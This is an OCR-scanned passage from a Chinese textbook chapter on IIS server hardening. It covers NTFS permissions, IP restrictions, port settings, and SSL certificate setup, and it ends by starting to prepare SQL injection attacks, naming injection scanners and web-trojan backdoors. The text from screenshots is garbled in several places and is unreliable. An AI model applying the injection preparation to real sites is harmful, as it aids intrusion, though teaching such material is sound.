此 外 ,还 有 “Active Directory 客户 端 证 书 身 份 验证 ?方式 (一 般 要 收费 使 用 ) .Form 身份 
验证 等 。 在 实际 应 用 中 ,可 以 根据 不 同 的 安全 性 需要 设置 不 同 的 用 户 认证 方式 。 
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1a. 访问 权限 控制 


1) NTFS 文件 系统 的 文件 和 文件 夹 的 访问 权限 控制 

将 Web 服务 器 安装 在 NTFS 分 区 上 的 优点 如 下 。 

(1) 对 NTFS 文 件 系 统 的 文件 和 文件 夹 的 访问 控制 权限 进行 设置 ,对 不 同 的 用 户 组 和 
用 户 授 予 不 同 的 访问 权限 。 右 击 要 设 定 访问 的 文件 和 文件 夹 ,在 弹出 的 快捷 菜单 中 选择 “ 属 
性 "命令, 打开“ 属性” 对话 框 。 然 后 选择 “安全 ”选项 卡 , 在 该 页 面 中 可 以 设置 允许 访问 该 文 
件 夹 的 不 同 组 和 用 户 的 权限 。 

(2) 利用 NTFS 文件 系统 的 审核 功能 ,对 某 些 特定 的 用 户 组 成 员 读 写 文件 的 企图 等 方 
面 进 行 审 核 , 有 效 地 通过 监视 (如 文件 访问 .用 户 对 象 的 使 用 等 ) ,发 现 非 法 用 户 进行 非法 活 
动 的 前 兆 , 以 便 及 时 加 以 预防 制止 。 在 选中 文件 或 文件 夹 的 属性 对 话 框 的 “安全 ”选项 卡 中 ， 
单 击 “ 高 级 "按钮 ,打开 高 级 安全 设置 对 话 框 ,如 图 7-5 所 示 。 




















者 
对 象 名 称 ce:\ 
审核 项 目 (T) 





要 查看 或 编辑 帘 核 项 目的 详细 信息 ， 请 选择 该 硕 目 并 单 击 “ 编 辑 ”。 
对 象 名 称 : 
审核 项 目 Cr) 
类型 
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宣 核 对 鳃 访 j 和 要 求 星 什么 ? 














Cm 号 | 
图 7-5 设置 NTFS 的 审核 功能 


2) Web 目录 的 访问 权限 控制 
对 于 已 经 设置 成 Web 目录 的 文件 夹 ,可 以 通过 上 述 操作 设置 目录 访问 权限 ,而 该 目录 
下 的 所 有 文件 和 文件 夹 都 将 继承 这 些 安全 性 设置 。 


14. IP 地 址 控制 


如 果 使 用 前 面 介绍 的 用 户 身份 验证 ,每 次 访问 站 点 时 都 需要 输入 用 户 名 和 密码 ,对 于 授 
权 用 户 而 言 比较 麻烦 。 在 选中 站 点 后 , 右 侧 的 功能 视图 中 ,选择 “IP 地 址 和 域 限制 "选项 。 
在 此 功能 中 ,IIS 可 以 设置 允许 或 拒绝 从 特定 IP 发 来 的 服务 请 求 ,有 选择 地 允许 特定 节点 的 
用 户 访问 Web 服务 ,如 图 7-6 所 示 。 在 右 侧 “ 编 辑 功能 设置 "选项 中 ,可 以 设置 采用 允许 方式 
或 拒绝 方式 管理 。 即 IP 地 址 黑 名 单 和 白 名 单 管理 的 方式 。 另 外 ,允许 和 拒绝 规则 的 添加 都 
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有 单独 IP 地 址 和 IP 地址 范围 两 种 方式 。 一 般 情况 下 ,在 设置 拒绝 特定 IP 访问 网 站 时 ,会 
把 “未 知 的 客户 端的 访问 权 ” 设 置 为 允许 ,然后 再 添加 拒绝 规则 。 













IP 地 址 和 域 限制 

好 限 添加 允许 科目 

使 用 此 功能 可 以 基于 Ip 地 址 或 域名 限制 或 摇 巴 访问 Web 内 容 的 权限 。 按 优先 级 顺序 设置 限制 测 mdE 络 条目 ~ 
编 加 功能 设置 

Kb 恢复 为 父 项 





楼 式 ”| 请 求 程序 科目 类型 









































图 7-6 设置 IP 地 址 控制 功能 


Ls. 端口 安全 

对 于 IIS 服务 ,无 论 是 Web 站 点 服务 .FTP 服务 还 是 SMTP 服务 ,都 有 各 自 的 TCP 端 
口号 用 来 监听 和 接收 用 户 浏览 器 发 出 的 请 求 ,一 般 的 默认 端口 号 为 WWW 是 80,FTP 是 
21,SMTP 是 25。 可 以 通过 修改 默认 的 TCP 端口 号 来 提高 IIS 服务 器 的 安全 性 ,因为 如 果 
修改 了 端口 号 ,就 只 有 知道 端口 号 的 用 户 才 能 访问 IIS 服务 器 。 当 然 前 文中 也 提 到 了 利用 
端口 扫描 工具 ,也 能 扫描 出 服务 器 的 端口 。 

修改 端口 号 ,可 以 在 IIS 中 选 定 站 点 ,在 站 点 右 侧 操作 中 选择 * 绑 定 ” 选 项 ,会 弹出 “网 站 
绑 定 ”对话 框 ,如 图 7-7 所 示 。 

在 “网 站 绑 定 ”对 话 框 中 , 单 击 “ 编 辑 ” 按 钮 ,可 以 修改 网 站 的 TCP 连接 端口 号 。 


Le. IP 转发 安全 


IIS 服务 可 以 提供 IP 数据 报 的 转发 功能 ,此 时 ,充当 路 由 器 角色 的 IIS 服务 器 将 会 把 从 
Internet 接口 收 到 的 IP 数据 报 转 发 到 内 网 中 。 为 了 提高 IIS 服务 的 安全 性 ,应 该 禁用 此 项 
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7-7 查看 网 站 绑 定 情况 


功能 。 可 以 通过 修改 注册 表 完 成 IP 转发 功能 的 设置 。 在 注册 表 项 HKEY_LOCAL _ 
MACHINE\SYSTEM\CurrentControlSet\ services\Tepip\Parameters 中 ,将 键 "IPEnableRouter” 
的 值 由 1 改 为 0。 


7: SSL 安全 


SSL(Secure Sockets Layer, 安 全 套 接 层 ) 在 传输 层 对 网 络 连接 进行 加 密 , 是 Netscape 公 
司 所 研发 ,用 以 保障 在 Internet 上 数据 传输 的 安全 ,利用 数据 加 密 (Encryption) 技 术 ,可 确保 
数据 在 网 络 上 之 传输 过 程 中 不 会 被 截取 及 窃听 。SSL 协议 采用 了 对 称 加 密 技术 和 公 钥 加 密 
技术 ,并 使 用 了 X. 509 数字 证 书 技术 ,实现 了 Web 客户 端 和 服务 器 端 之 间 数 据 通信 的 保密 
性 ,完整 性 和 用 户 认证 。 其 工作 原理 是 使 用 SSL 安全 机 制 时 ,首先 在 客户 端 和 服务 器 端 之 间 
建立 连接 ,服务 器 将 数字 证 书 连同 公开 密 钥 一 起 发 给 客户 端 。 在 客户 端 ,随机 生成 会 话 密 
钥 , 然 后 使 用 从 服务 器 得 到 公开 密 钥 加 密会 话 密 钥 ,并 把 加 密 后 的 会 话 密 钥 在 网 络 上 传送 给 
服务 器 。 服 务 器 使 用 相应 的 私人 密 钥 对 接收 的 加 密 了 的 会 话 密 钥 进行 解密 ,得 到 会 话 密 钥 ， 
之 后 ,客户 端 和 服务 器 端 就 可 以 通过 会 话 密 钥 用 对 称 加 密 的 方式 通信 的 数据 了 。 这 样 客户 
端 和 服务 器 端 就 建立 了 一 个 唯一 的 安全 通信 通道 。 

SSL 协议 提供 的 安全 通道 有 以 下 三 个 特性 。 

(1) 机 密 性 : SSL 协议 使 用 密 钥 加 密 通 信 数 据 。 

(2) 可 靠 性 : 服务 器 和 客户 都 会 被 认证 ,客户 的 认证 是 可 选 的 。 

(3) 完整 性 : SSL 协议 会 对 传送 的 数据 进行 完整 性 检查 。 

通过 JIS 在 Web 服务 器 上 配置 SSL 安全 功能 ,可 以 实现 Web 服务 器 端 与 客户 端的 安全 
通信 (以 https:// 开 头 的 URL) ,避免 数据 被 中 途 截获 和 自 改 。 对 于 安全 性 要 求 很 高 .可 交 
互 性 的 Web 网 站 ,建议 采用 SSL 进行 传输 。 


PP 7.2.4 配置 SSL 安全 站 点 


在 浏览 网 站 时 ,多 数 网 站 的 URL 都 是 以 http 开头 ,百度 也 在 2014 年 年 底 已 启用 全 站 
https。HTTP 协议 相对 比较 熟悉 ,信息 通过 明文 传输 ,使 用 HTTP 协议 有 它 的 优点 , 它 与 
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服务 器 间 传 输 数 据 更 快速 准确 ; 但 是 HTTP 明显 是 不 安全 的 ,目前 的 应 用 ,如 在 使 用 邮件 或 
者 是 在 线 支付 时 ,都 是 使 用 HTTPS,HTTPS 传输 数据 需要 使 用 证 书 并 对 进行 传输 的 信息 
进行 了 加 密 处 理 , 相 对 HTTP 更 安全 。 

以 下 将 介绍 如 何 实现 客户 机 和 服务 器 之 间 的 SSL 安全 通信 。 配 置 环境 如 下 。 

(1) Windows 版 本 : Windows Server 2008 R2 Enterprise Service Pack 1 。 

(2) 系统 类 型 : 64 位 操作 系统 。 

这 里 说 的 证 书 指 的 是 数字 证 书 , 是 一 种 由 证 书 颁发 机 构 颁 发 ,并 经 证 书 颁 发 机 构 数字 签 
名 的 ,用 于 证 明证 书 持 有 人 身份 的 网络 身份 证 ”, 其 中 包括 了 证 书 持 有 人 的 公开 密 钥 信 息 的 
证 书 颁发 机 构 的 数字 签名 ,还 可 以 包括 用 户 的 其 他 信息 。 数 字 证 书 的 权威 性 取决 于 颁发 机 
构 的 权威 性 。 具 体操 作 步 又 如 下 。 


Li 安装 证 书 服务 


(1) 在 “开始 "菜单 一 “管理 工具 ”一 “服务 器 管理 器 ”中 ,选择 左 侧 的 “角色 ”节点 , 右 击 选 
择 “ 添 加 角色 ”命令 。 然 后 在 打开 的 对 话 框 中 选择 “Active Directory 证 书 服务 " 复 选 框 ,如 
图 7-8 所 示 。 


etory Rights Managenent Services 
联合 身份 验证 服务 





7-8 ”服务 器 添加 证 书 服务 角色 


(2) 单 击 “ 下 一 步 "按钮 ,出 现 “证 书 服务 简介 ”界面 ,简单 介绍 什么 是 证 书 服务 及 注意 事 
项 ,如 安装 CA 后 ,无 法 更 改 计 算 机 的 名 称 和 域 设置 等 。 
(3) 单 击 “ 下 一 步 " 按 钮 ,弹出 “添加 角色 向 导 ” 界 面 。 需 要 添加 三 项 内 容 : 证 书 颁发 机 


的 一 一 


meer 








构 ,证 书 颁发 机 构 Web 注册 联机 响应 程序 。 在 选择 “证 书 颁发 机 构 Web 注册 ”选项 时 ,会 
有 弹出 窗口 ,要求 安装 相关 功能 ,如 图 7-9 所 示 。 单 击 “ 添 加 所 需 的 角色 服务 ”按钮 ,并 单 击 
“下 一 步 ?按钮 继续 安装 。 





Lp 是 否 添 加 证 书 颁发 机 构 Web 注册 所 需 的 角色 服务 和 功能 ? 


0 | 无 法 安装 证 书 最 帮 机 构 Yeb 注册 ， 除 看 吨 安 装 所 村 的 角色 服务 和 功能 。 
以 名 角色 服务 g) EE 
有 效 wh 服务 器 OS) eb 服务 加 (ITS) 提供 可 靠 、 可 管理 并 


司 扩 属 的 Web 应 用 程序 基础 结构 * 





En se | nw | 
图 7-9 选择 角色 服务 中 添加 向 导 


(4) 指定 安装 类 型 ,选择 “企业 ?选项 , 单 击 “ 下 一 步 ?按钮 。 

货 注 :“ 企 业 " 需 要 域 环境 ; “独立 "不 需要 域 环 境 。 

(5) 在 “指定 CA 类 型 "界面 中 ,选择 “ 根 ” 选 项 , 单 击 “ 下 一 步 ” 按 钮 。 

(6) 在 “设置 私 钥 " 界 面 中 ,选择 “新 建 私 钥 ” 选 项 , 单 击 “ 下 一 步 "按钮 。 

(7) 选择 加 密 服 务 提供 程序 为 RSA # Microsoft Software Key Storage Provider, 密 钥 字 
符 长 度 为 2048, 选 择 此 CA 颁发 的 签名 证 书 的 哈 希 算法 为 SHA1, 如 图 7-10 所 示 。 然 后 单 
击 “ 下 一 步 ” 按 钮 。 

(8) 在 “配置 CA 名 称 ” 界 面 中 , 单 击 “ 下 一 步 ” 按 钮 。 注 意 ,最 好 不 要 改 生成 的 名 称 。 

(9) 选择 “设置 证 书 有 效 期 "选项 ,默认 为 5 年 , 单 击 “ 下 一 步 按 钮 。 

(10) 在 “配置 证 书 数据 库 ? 界 面 中 ,会 生成 证 书 数据 库 和 日 志 的 文件 路 径 , 选 择 默认 路 
径 (%SystemRoot%\System32\CertLog) 即 可 ,然后 单 击 “ 下 一 步 ”按钮 。 

(11) 单 击 * 下 一 步 ?按钮 ,要 求 IIS 服务 器 的 选项 安装 ,选择 运行 ASP. NET 网 站 必需 的 
复 选 框 , 单 击 “ 下 一 步 " 按 钮 ,安装 项 如 图 7-11 所 示 。 

(12) 单 击 “ 安 装 ” 按 钮 ,等 到 提示 各 项 都 安装 成 功 后 , 单 击 “ 关 闭 ” 按 钮 .如 图 7-12 所 示 。 





一 一作 








图 7-10 为 CA 配置 加 密 项 





图 7-11 对 Web 服务 器 的 要 求 





Tinaews 动 更 新 最 村 安装 的 册 色 或 功能 ， . ”大 
主考 站 风 eye. 让 动 更 新 * 为 人 和 请 启用 “控制 面板" 扣 





图 7-12 ”SSL 证 书 服务 安装 完成 


12. 新 建 自 签名 证 书 并 配置 https 


(1) 选中 IIS 根 节点 ,在 “功能 视图 ”中 进入 “服务 器 证 书 ” 选 项 ,如 图 7-13 所 示 。 





图 7-13 在 TIS 中 打开 服务 器 证 书 项 


EL 








(2) 找到 7. 2.4 小节 中 配置 的 CA, 如 图 7-14 所 示 , 然 后 单 击 右 侧 “创建 自 签名 证 书 ” 选 
项 ,在 弹出 的 “创建 自 签名 证 书 ” 对 话 框 中 ,给 要 创建 的 自 签名 证 书 输入 一 个 好 记 的 名 字 。 


@ 服务 器 证 书 
种 本 家 和 7 的 


a 
Ts Defaalt Web Site 


司 wpnet_elient 





图 7-14 在 IIS 中 创建 自 签名 证 书 


(3) 在 IIS 中 添加 网 站 SSLTest, 绑 定 类 型 为 https, 端 口号 为 默认 的 443,SSL 证 书 选择 
刚 创 建 好 的 自 签名 证 书 , 单 击 “ 确 定 ” 按 钮 ,如 图 7-15 所 示 。 
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图 7-15 在 IIS 中 创建 https 网 站 


weer 








在 图 7-15 中 ,SSL 证 书 是 在 7. 2. 4 小 节 中 创建 的 自 签名 。 
(4) 在 服务 器 浏览 器 打开 加 密 网 站 ,如 图 7-16 所 示 。 


后 证 书 猪 误 : 导航 已 阻止 Internet Explo L-JL>j 


EH [DB ps io zaolozzry 王国 Sb: smemt xl ee 
主人 编辑 人 E) 查看 W) | 收藏 只 工具 0) ”帮助 00 






























名 此 网 站 的 安全 证 书 存在 问题 





此 网 站 出 具 的 安全 证 书 是 为 其 他 网 站 地 址 颁发 的 
安全 证 书 问题 可 能 显示 试图 欺骗 你 或 截获 你 向 服务 器 发 送 的 数据 . 


建议 关闭 此 网 页 ， 并且 不 要 继续 浏览 该 网 站 . 
加 单 击 此 处 关闭 该 网 页 。 
入 继续 浏览 此 网 站 (不 推荐 )。 











图 7-16 打开 https 网 站 时 的 提示 


单 击 “ 继 续 浏览 此 网 站 ”链接 ,成 功 显示 内 容 ,https 在 实验 环境 下 配置 成 功 ,如 图 7-17 
所 示 。 
1 


“文件 人 0 坊 醒 J 查看 WI 中 瑟 天 W) 工具 TT 于 动 00 








internet information services 
图 7-17 打开 https 网 站 


单 击 浏览 器 上 提示 的 * 证 书 错误 ”链接 ,可 以 查看 证 书 , 如 图 7-18 所 示 。 证书 是 颁发 给 
gczx-ms 的 (这 里 的 gczx-ms 是 服务 器 的 名 称 )。 一 般 来 说 , 非 实 验 环 境 下 这 项 只 为 一 
址 ,如 porsche. adserv. com。 

在 实验 环境 中 ,可 以 对 默认 的 网 站 添加 一 个 https 的 绑 定 ,采用 的 证 书 是 颁发 给 
gczx-ms 的 ,那么 用 https://gczx-ms 打开 就 应 该 可 以 看 到 加 密 传输 的 锁 形 图 标 了 ,如 图 7-19 
所 示 。 
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图 7-19 SSL 加 密 访问 成 功 


一 般 的 商家 都 是 需要 花 钱 才 可 以 购买 SSL 的 ,目前 全 球 有 为 数 不 多 的 免费 SSL 证 书 提 
供 商家 ,如 StartSSL, 用 户 可 以 从 其 官网 申请 到 免费 的 SSL, 支 持 主流 的 Firefox、Chrome、 
Safari 等 浏览 器 使 用 ,免费 使 用 3 年 (官方 网 站 地 址 : https://www. startssl. com/), 如 
7-20 所 示 。 


ON—————"—"— 





ain 1 DE oe da ec ln 


© Oo 























StartssL™ Organization Validation StartssL™ Identity Validation StartssL™ Free 
UMMTED - Ciane 3 OV SeL UMMTED - Cass 2 IV sel Cartficate UNUMTED -Class 1 DV SSL 
Ce NIMTED Cass 2 Ciert Caritate 
UNUMTED - Class 3 Organization (up to 10 domams per Certificate) 
ohE-cam 2 Cede sgnmg Caricate 

Cs Canis UNUMTED - Class 1 Ema aldabon 
ohE-cam Code sg Cafiecate js 

Ml earthicates mre veld for 3 years 

$ 199.90v vardaton Fee | $119.80v vandatonree $ 59.90v valdaton Fee $0.00 
Al Certificates are FREE Al Certificates are FREE All Ceruficales are FREE 







Start Now! 





Start Now! 


图 7-20 StartSSL 免费 证 书 申请 


Es. 证 书 的 申请 和 颁发 


1) 服务 器 向 证 书 颁发 机 构 申 请 证 书 
(1) 如 图 7-14 所 示 , 单 击 右 侧 “ 创 建 证 书 申请 "按钮 ,打开 “申请 证 书 ” 对 话 框 填写 表单 ， 
参照 图 7-21 填写 ,注意 不 要 填写 中 文 (一 般 的 证 书 颁发 机 构 都 不 支持 中 文 )。 


可 分 辨 名 称 属 性 


yudata com cn 
aata co en 


[yudata 














图 7-21 申请 证 书 填写 信息 


(2) 设置 好 证 书信 息 之 后 , 单 击 “ 下 一 步 ” 按 钮 ,进入 “证 书 加 密 设置 "选项 ,选择 默认 的 
加 密 服务 器 ,也 可 以 根据 需求 来 选择 。 设 置 加 密 长 度 , 建 议 设置 为 2048 或 以 上 。 


——— 








2 必 


(3) 单 击 “ 下 一 步 ?按钮 ,出 现 的 一 个 证 书 申请 文件 的 保存 提示 。 可 直接 输入 文件 名 , 默 
认 保 存在 桌面 上 。 此 外 ,设置 文件 名 为 sgtest。 用 记事 本 打开 ,其 内 容 如 图 7-22 所 示 。 





[ - 记事 本 LDL>j 
文件 中) 编辑 中) 格式 中) 查看 WM 帮助 00 
十 -一 -BEGIN NEW CERTIFICATE REQUEST——— 





fbVgAVqrslujZmwfJg+NNVIInyk97WadKtkgHtALjvPjEi8gH7RYth/OhCSJ+iT3w 
RjlLxyrBINK dnOAvswR8awAShaqAj/iGMeD3zD5C+1 /8GpjBNlygnhvTOnJWJCHB 
17/aDPEaqNvT5Tfb8LA9uQBNLMUmpUREMbSMkYFhaTQddoullUoa2Rfk9jf] j2Xsc 
s56Y5KdG/OnTWzZ80eXKTBkTEHaIhcPT3ApG dqBYwOBO2YNEpwSatlLg7e80bTzO 
nkl1VnRKooBGB1QktmRT2kCc4ysoDQsA+pRA3BLP/ki3SNJENB71kxHiEiLtYKG4L4 
强 VwFNEbVh2bwTnVAgJIBAAGgggGZJIBoGCisGAQQBgjcNAgJxDBYKNi 4xL jc2MDEu 
DjA1BgkrBgEEAYI3FRQxKDAmAgEFDAdnY3p4LW1zDAtHQlpYLU1TXGxnaAmwLSW51 
dElnciS5leGUwcgYEEwYBBAGCNwOCA jFkMGICAQEeWeBNAGkAYwByAG8AcwBvAGYA 
dAAgAF TAUwBBACAAUwBDAGgAYQBUAGAAZQBSACAAQwByAHkE ACABOAG8AZwByAGEA 
CABOAGkAYwAgAF AAcgBvAHY AaQBkAGUAceMBADCBzwY JKoZIhveNAQkONMYHBMIG+ 
MAdGAlUdDwEB/wQEAwIESDATBeNVHSUEDDAKBggrBeEFBQcDATB4Bek qhkiG9wOB 
Ca8EazBpJIA46CCq6SIb3DQJICAgIAgDADBggqhkiG9w0DBAICAIAwCmYJYIZIANWUD 
BAEqMAsGCWCGSAF 1AwQBLTALBg1ghkgBZQJEAQIwCwYJYIZIANRUDBAEFJIAcGBSsO 
AmIHIAoGCCqGSIb3DQIHIBOGA1UdDgQWBBRUolTrIv8jc8/SBCVy1QmLysFesjAN 
BgkqhkiG9w0BAQUFAADCAQEASV4SBKf3+djf+br+It1Z9A+K3KmHiqgvqGwQN16F 
qFhv+YOmt9+qbURJaNqHmL+pP3YEJ67Sdl1S0dj4CJVqY1QPaVeExyq0TsKX2jQlR 
|HWmW6re2INgaGroTR15C5+Ye2KxNtP3cAdEC1KuUAsbH6TZUs3x2Yu0MQ3EL2k3B， 
FxdGv2kw3eudpfEVYakKWkzr/wdpv2DWbaQ7GZQO0Y1 gl1GF870+do7x/vCaeATRw+Id 
XjksrpeUZw?TN+l1zRSSHqi oOEwaQK 8Byl 4AF j/aIJ9WZVqsYsDow6vgYSoLIIR7Du+ 
F9+1DImfa8En2qQLH824RWHwL1PyL1StGerQKhyvhBHIzw== 

一- END NEW CERTIFICATE REQUEST———— 


剧 
图 7-22 证 书 申请 文件 的 内 容 

(4) 把 “证 书 申请 文件 ”发送 给 证 书 颁发 结构 。 

2) 完成 证 书 申请 

证 书 正 式 颁发 后 ,在 图 7-14 中 单 击 右 侧 的 “完成 证 书 申请 ”按钮 ,导入 颁发 机 构 的 响应 
文件 ,完成 申请 。 

注意 在 证 书 还 没有 正式 颁发 下 来 之 前 ,IIS 上 的 证 书 申请 不 要 删除 。 否 则 申请 没有 办 法 
继续 完成 。 


3) 向 安装 证 书 服务 的 服务 器 申请 证 书 

(1) 证 书 服务 安装 完成 后 ,在 IIS 的 默认 站 点 中 会 出 现 两 个 虚拟 目录 : CertSrv 和 ocsp。 
OCSP(Online Certificate Status Protocol ,在线 证 书 状态 协议 ) 是 维护 服务 器 和 其 他 网 络 资 
源 安 全 性 的 两 种 普遍 模式 之 一 。OCSP 克服 了 证 书 注 销 列表 (CRL) 的 主要 缺陷 : 必须 经 常 
在 客户 端 下 载 以 确保 列表 的 更 新 。 当 用 户 试 图 访问 一 个 服务 器 时 ,在 线 证 书 状 态 协议 发 送 
一 个 对 于 证 书 状态 信息 的 请 求 。 

为 默认 站 点 ,增加 绑 定 443 端口 ,使 默认 站 点 可 以 使 用 https 浏览 。 

(2) 打开 浏览 器 ,输入 网 址 https://gczx-ms/certsrv/default. asp, 如 图 7-23 所 示 。 

(3) 在 图 7-23 中 , 单 击 “ 申 请 证 书 ” 按 钮 ,可 以 提交 一 个 证 书 申请 或 续 订 申请 。 打 开 “ 管 
理工 具 ”>“ 证 书 颁发 机 构 ” 服 务 , 可 以 对 申请 的 证 书 进行 颁发 .吊销 等 管理 ,如 图 7-24 所 示 。 
双击 证 书 , 可 以 查看 证 书 ,如 查看 到 证 书 的 作用 、 所 有 者 、 颁 发 者 和 有 效 期 等 信息 。 

(4) 当 申 请 的 证 书 被 机 构 同 意 颁发 后 ,申请 的 用 户 可 以 在 浏览 器 前 台 下 载 证 书 ( 见 
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使 用 此 网 站 为 您 的 Web 浏览 器 、 电 子 邮件 客户 端 或 其 他 程序 申请 证 书 。 通 过 使 用 证 书 ， 
您 可 以 向 通过 Web 进行 通信 的 用 户 确认 您 的 身份 、 签 名 并 加 客 邮件 ， 并 根据 您 申请 的 证 
书 类 型 执行 其 他 安全 任务 。 


您 也 可 以 使 用 此 网 站 下 载 证 书 颁 发 机 构 (CA) 证 书 、 证 书 链 ， 或 证 书 吊销 列表 (CRD , 或 者 
查看 挂 起 申请 的 状态 。 


有 关 Active Directory 证 书 服务 的 详细 信息 ， 请 参阅 Active Directory 证 书 服务 文档 

一作， 本 

让 择 ; 人 任务 : 
查看 挂 起 的 证 书 申请 的 状态 


下 载 _CA 证书、 证书 链 或 CRL 


























图 7-23 本 地 证 书 服务 界面 


外 -ertsrv - [证 书 颁发 机 构 (本 地 )\GCZX-HS-CA\ 倾 发 的 证 书 ] 





文件 四 。 操作 凶 ， 查 看 帮助 中 
争 中 | 方 | a 世 | 加 
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日 加 CZX-NS-CA 

男 吊销 的 证 书 
颁发 的 证 书 
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国 挂 起 的 申请 
国 失败 的 申请 
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图 7-24 本 地 证 书 颁发 机 构 管理 证 书 


图 7-23)。 单 击 “ 下 载 CA 证 书 .证 书 链 或 CRL” 链 接 后 ,出 现 如 图 7-25 所 示 的 网 页 ,可 以 下 
载 证 书 certnew. cer, 证 书 内 容 可 参看 图 7-22。 证 书 下 载 后 可 安装 使 用 。 

QO@ DER 编码 二 进 制 X. 509: 卓越 编码 规则 (DER)X. 509 为 证 书 和 其 他 用 于 传输 文件 
的 编码 定义 了 一 种 平台 独立 性 的 方法 。 也 就 是 说 ,这 种 方法 适合 使 用 任何 一 种 操作 系统 的 
计算 机 。 如 果 要 将 证 书 用 于 其 他 非 Windows 的 操作 系统 上 ,就 可 以 使 用 这 种 文件 类 型 。 这 
种 文件 类 型 使 用 . cer 或 . crt 的 文件 扩展 名 。 

@ Base64 编码 X. 509: 这 也 是 一 种 X. 509 格式 ,该 X. 509 的 变 体 采取 了 一 种 为 配合 
S/MINE( 一 种 在 Internet 上 安全 发 送 电 子 邮件 附件 的 标准 方法 ) 使 用 而 设计 的 编码 方法 。 
整个 文件 作为 ASCII 字符 编码 ,这 样 就 可 以 保证 它 不 受 损坏 地 通过 不 同 的 邮件 网 关 。 这 种 
文件 类 型 使 用 . cer 或 . crt 文件 扩展 名 。 
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下 载 CA 证 书 、 证 书 链 或 CRL 


若 要 信任 从 该 证 书 颁发 机 构 颁 发 的 证 书 ， 请 安装 此 CA 证 书 链 。 
要 下 载 一 个 CA 证 书 、 证 书 链 或 CRL ,选择 证 书 和 编码 方法 。 


编码 方法 : 











图 7-25 下 载 证 书 服务 


ENE 脚本 语言 的 安全 性 
j* 7.3.1 脚本 语言 概述 


服务 器 端 脚本 是 对 服务 器 行为 的 编程 ,这 被 称 为 服务 器 端 脚本 或 服务 器 脚本 。 客 户 端 
脚本 是 对 浏览 器 行为 的 编程 。 通 常 , 当 浏览 器 请 求 某 个 HTML 文件 时 ,服务 器 会 返回 此 文 
件 。 但 如 果 此 文件 含有 服务 器 端的 脚本 ,那么 在 此 HTML 文件 作为 纯 HTML 被 返回 浏览 
器 之 前 ,首先 会 执行 HTML 文件 中 的 脚本 。 服 务 器 脚本 主要 作用 如 下 。 

(1) 动态 地 向 Web 页 面 编 辑 、 改 变 或 添加 任何 的 内 容 。 

(2) 对 由 HTML 表单 提交 的 用 户 请 求 或 数据 进行 响应 。 

(3) 访问 数据 或 数据 库 , 并 向 浏览 器 返回 结果 。 

(4) 为 不 同 的 用 户 定制 页 面 。 

(5) 高 网 页 安全 性 ,使 网 页 代码 不 会 通过 浏览 器 被 查看 到 。 

了 注意 : 由 于 脚本 在 服务 器 上 执行 ,因此 浏览 器 在 不 支持 脚本 的 情况 下 也 可 以 显示 服 
务 器 端的 文件 。 

常见 的 服务 器 端 脚本 语言 主要 有 PHP、JSP、ASP、ASP. NET 等 。 客 户 端 脚本 有 
JavaScript、Perl 等 。 服 务 器 脚本 运行 于 服务 器 之 上 ,用 户 看 不 到 服务 器 脚本 的 内 容 , 得 到 的 
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只 有 脚本 解释 器 发 回 浏览 器 的 HTML 代码 。 客 户 端 脚本 脱离 服务 器 运行 ,比如 一 次 性 读 和 人 
整体 的 数据 ,然后 将 数据 存 人 客户 端 (浏览 器 ) 的 进程 当中 ,这 样 下 次 就 不 用 重新 建立 链接 ， 
用 户 从 客户 机 上 得 到 数据 ,不 需要 与 服务 器 频繁 通信 ,主要 实现 客户 端 上 的 简单 逮 辑 。Ajax 
技术 让 客户 端 脚 本 变 得 另类 且 强大 ,使 客户 端 语言 将 数据 库 操作 封装 起 来 ,允许 用 户 在 一 个 
界面 实现 完全 分 离 的 数据 库 操作 请 求 。 


P 7.3.2 脚本 漏洞 注入 前 的 准备 


脚本 安全 问题 的 出 现 并 不 是 脚本 语言 本 身 的 问题 ,更 多 的 原因 是 脚本 程序 在 设计 过 程 
中 考虑 不 周 , 而 Web 管理 员 在 将 其 放 到 Web 服务 器 之 前 ,并 没有 进行 严格 的 安全 测试 ,从 
而 使 脚本 程序 给 了 黑客 们 以 可 乘 之 机 。 最 常用 的 攻击 手段 是 注入 攻击 。 

脚本 注入 攻击 是 攻击 者 通过 Web 把 恶意 的 代码 传播 到 其 他 的 系统 上 ,这些 攻击 包括 系 
统 调用 (通过 shell 命令 调用 外 部 程序 ) 和 后 台数 据 库 调 用 (通过 SQL 注入 ) 等 。 当 一 个 Web 
应 用 程序 通过 HTTP 请 求 把 外 部 请 求 的 信息 传递 给 应 用 后 台 时 ,必须 非常 小 心 。 否 则 注入 
攻击 就 可 以 将 特殊 字符 、 恶 意 代码 或 者 命令 改变 器 注入 这 些 信息 中 ,并 传输 到 后 台 执 行 。 

由 于 SQL 注入 是 从 正常 的 Web 端口 攻击 的 ,而 且 看 起 来 和 一 般 的 Web 页 面 一 样 ,所 以 
目前 防火 墙 无 法 发 现 SQL 注入 攻击 。 如 果 网 站 管理 员 没 有 查看 IIS 日 志 的 习惯 , 则 可 能 在 
被 注入 攻击 后 很 长 时 间 都 不 会 发 觉 ,所 以 SQL 注入 攻击 是 目前 黑客 比较 喜欢 的 攻击 方式 。 

具体 操作 步骤 如 下 。 


用 1. 客户 端 IE 浏览 器 设置 


由 于 SQL 注入 攻击 需要 利用 服务 器 返回 出 错 信息 ,但 在 IE 浏览 器 中 默认 是 不 显示 友 
好 HTTP 错误 信息 的 ,所 以 在 进行 SQL 注入 攻击 前 需要 设置 属性 。 

(1) 打开 下 浏览 器 ,选择 “工具 ”>“Internet 选项 ”命令 ,打开 “Internet 选项 ”对 话 框 。 

(2) 打开 “高 级 ”选项 卡 , 在 “设置 "列表 中 选择 “显示 友好 HTTP 错误 消息 ” 复 选 框 ,如 
图 7-26 所 示 。 单 击 “ 确 定 ” 按 钮 , 即 可 完成 设置 。 


12. 准备 注入 工具 


在 SQL 注入 过 程 中 ,一 般 会 利用 一 些 特殊 的 工具 来 提高 人 侵 的 效率 和 成 功率 ,如 SQL 
注入 漏洞 扫描 工具 、 注 入 辅助 工具 及 Web 木马 后 门 ,在 进行 注入 攻击 前 需 准 备 这 几 种 工具 。 

1) SQL 注入 漏洞 扫描 器 

注入 工具 是 用 来 检测 网 站 漏洞 并 检测 出 一 些 敏 感 信 息 用 的 工具 。 可 用 于 ASP 环境 的 
注入 扫描 器 有 NBSI“ 冰 舞 ” 等 ,其 中 * 冰 舞 ? 是 一 款 针对 ASP 脚本 网 站 的 扫描 工具 , 它 可 以 
寻找 目标 网 站 存在 的 注入 漏洞 。 

而 用 于 PHP 十 MySQL 环境 的 注入 工具 有 CASI、PHPrf、“ 二 娃 ” 等 。 其 中 CASI 是 用 
